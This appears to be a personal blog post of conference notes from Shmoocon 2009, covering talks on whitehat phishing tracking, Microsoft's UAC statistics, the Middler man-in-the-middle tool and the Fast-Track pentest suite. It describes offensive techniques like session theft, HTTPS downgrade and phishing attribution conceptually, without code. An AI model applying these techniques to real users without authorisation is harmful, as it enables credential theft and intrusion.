Shmoocon 2009 Day 2

I really shouldn’t have to wake up at 7:30 am on a Saturday and take the Metro into DC. Fortunately I thought the 10am talk was worth it.
Phishing Statistics and Intuitive Enumeration of Hosts and Roles
by Sean Palka
This talk is about a tool he created/uses in corporate engagements. But as with most things developed on company time, its not free to be released. The presentation is to give you ideas. And it does make me realize that could be a fun side project if I can’t get money for Phishme and I cant get ahold of Lunker.
The motivation for this tool is to justify to clients that phishing is a useful exercise. He also wanted the tool to gather reliable stats for reporting.
When phishing a company you may find that distribution lists are hit. You may find email forwarded from one user to another. Just as with a marketing campaign, webbugs, images and unique identifiers in URLs are used to determine who is following a link. Most mail clients no longer load images by default, so that cuts down somewhat on the capability to determine a message was read but the link was not clicked on. However, some companies may whitelist their own domain name allowing images to load automatically.
A bad guy phishing doesn’t care who responds. He just wants the credentials. But whitehat phsihing needs reports and attribution. You want to know who just visited the site without providing the phished for information. Your phishing site could have contained a browser exploit just as easily.
Tagging or using unique identifiers in URLs does not solve the problem of message forwarding or when a single user has logged in at multiple locations. While time can be used to determine the person probably didn’t drive home, that person could have used remote desktop. You just dont know if the message was forwarded or if the user is going from computer to computer trying the URL.
An audience member pointed out that you could use images and the client cache to determine if the same computer visits more than once. (I’m not sure how that would work if a proxy is used).
You may be able to determine “important” systems by the responses as well. If one computer has a higher than normal amount of responses it might be a helpdesk or admin checking our user reports. Obviously if NAT is involved, you need to do your phishing from internal.
Additionally you can determine social networks by seeing to whom the email is forwarded.
When a internal system is used for a phishing attack the following are pros/cons
– The firewall prevents external connections. Email may be forwarded externally and responses cannot get to your internal site.
– People may trust the internal IP and act differently.
– You don’t have to worry about your other security filtering getting in the way. This isn’t a test of your spam filter.
– you can build focused attack on victims.
Whitehat phishing attacks where the website is external have little ability to get the client IP. He said he hasn’t had a lot consistent success using PHP. This limits reporting capabilities when NAT is used.
I didn’t ask if he did customization to use the users names in the target emails.
He doesn’t include training in the tools (as Phishme does) because the focus of his tool is pentesting not security training. While this is understandable given his role at BAH, I think most people looking to do whitehat phishing are going to want to provide the immediate user feedback/training that has been proven to be effective.
Stranger in a Strange Land: Reflections on a Linux guy’s First Year at Microsoft
by Crispan Cowan
A lot of the talk, I felt I’d seen in either the SDL blog or from Jeff Jones’ blog. Basically slides pointing out the success of the Security Development Lifecycle at Microsoft. Security at Microsoft comes down to before the 2002 Bill Gates Memo and after. For those who don’t know, Microsoft shut down coding for a month and re-trained employees in secure coding practices. They then followed up and made sure people did it.
One of the big problems that isn’t going away is legacy. There are a lot of applications that rely on doing dangerous stupid things that they have been allowed to do. There is so much breakage you can do before people start to push back. (side comment, it was a huge deal for Microsoft to disable IIS by default in a desktop operating system. Their application vendors expected it to be there). It is hard to fix architecture issues without screwing old applications. The application base is the value in Windows.
One of the big problems is the massive dependence on local admin. UAC is the stick used to cause programs to write their application so it doesn’t require local admin rights. Its not UAC that sucks, its the crappy application that needs admin rights just to run.
88% of users participating in the feedback program leave UAC enabled.
Another metric they use is sessions that are UAC prompt free.
In Vista RTM, this was 50%.
With SP1, consumer desktops were at 65% and computers joined to a domain (work computers) was at 80%.
I assume this means the applications are getting improved to not need admin rights. It could mean people stopped using the crappy app.
Middling Everything with Middler
by Jay Beale
Obviously MITM is nothing new. What this project does is

  1. Inject javascript into HTTP
  2. Store session ID
  3. Intercept logout requests (even if you think you’ve logged out you haven’t
  4. Replace https links with http links (your http bank site which only uses https for login is now logging in in clear text)

The purpose of the tool is:

  • Inject javascript into every page
  • inject temp or permanent redirects
  • Take over website with Browser exploitation framework
  • Compromise user with metasploit

Middler is available on the InGuardians website.
The Agreement
A group of friends set up a framework of rules to govern as they attempt to 0wn each others computers. When no one else will set up a capture the flag exercise for you, you hack on each other.
http://www.jointheagreement.com/
The Fast-Track Suite
by David Kennedy
The Fast Track suite will be available in Backtrack 4. Or check out the Fast Track website..
All I seem to remember is “pop a box.” ๐Ÿ˜‰
Very interesting point and click hacking. As I understand it, some Metasploit attacks were only available for old specific service packs, he has made the attacks more universal.
In Pen Testing, I believe people use Windows debug to convert the uploaded hex into binary. There is a built in 64 kb limit. He automates a way to get around that by supplying a new debug util (at least that is how I understood it).
In the demos he’d run an exploit upload vnc server and connect to it.
I didn’t get a chair during this talk so I dont have a lot of notes.